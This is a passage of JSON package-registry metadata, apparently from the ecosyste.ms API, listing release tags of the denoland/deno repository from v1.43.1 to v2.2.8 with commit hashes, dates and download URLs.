4:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/den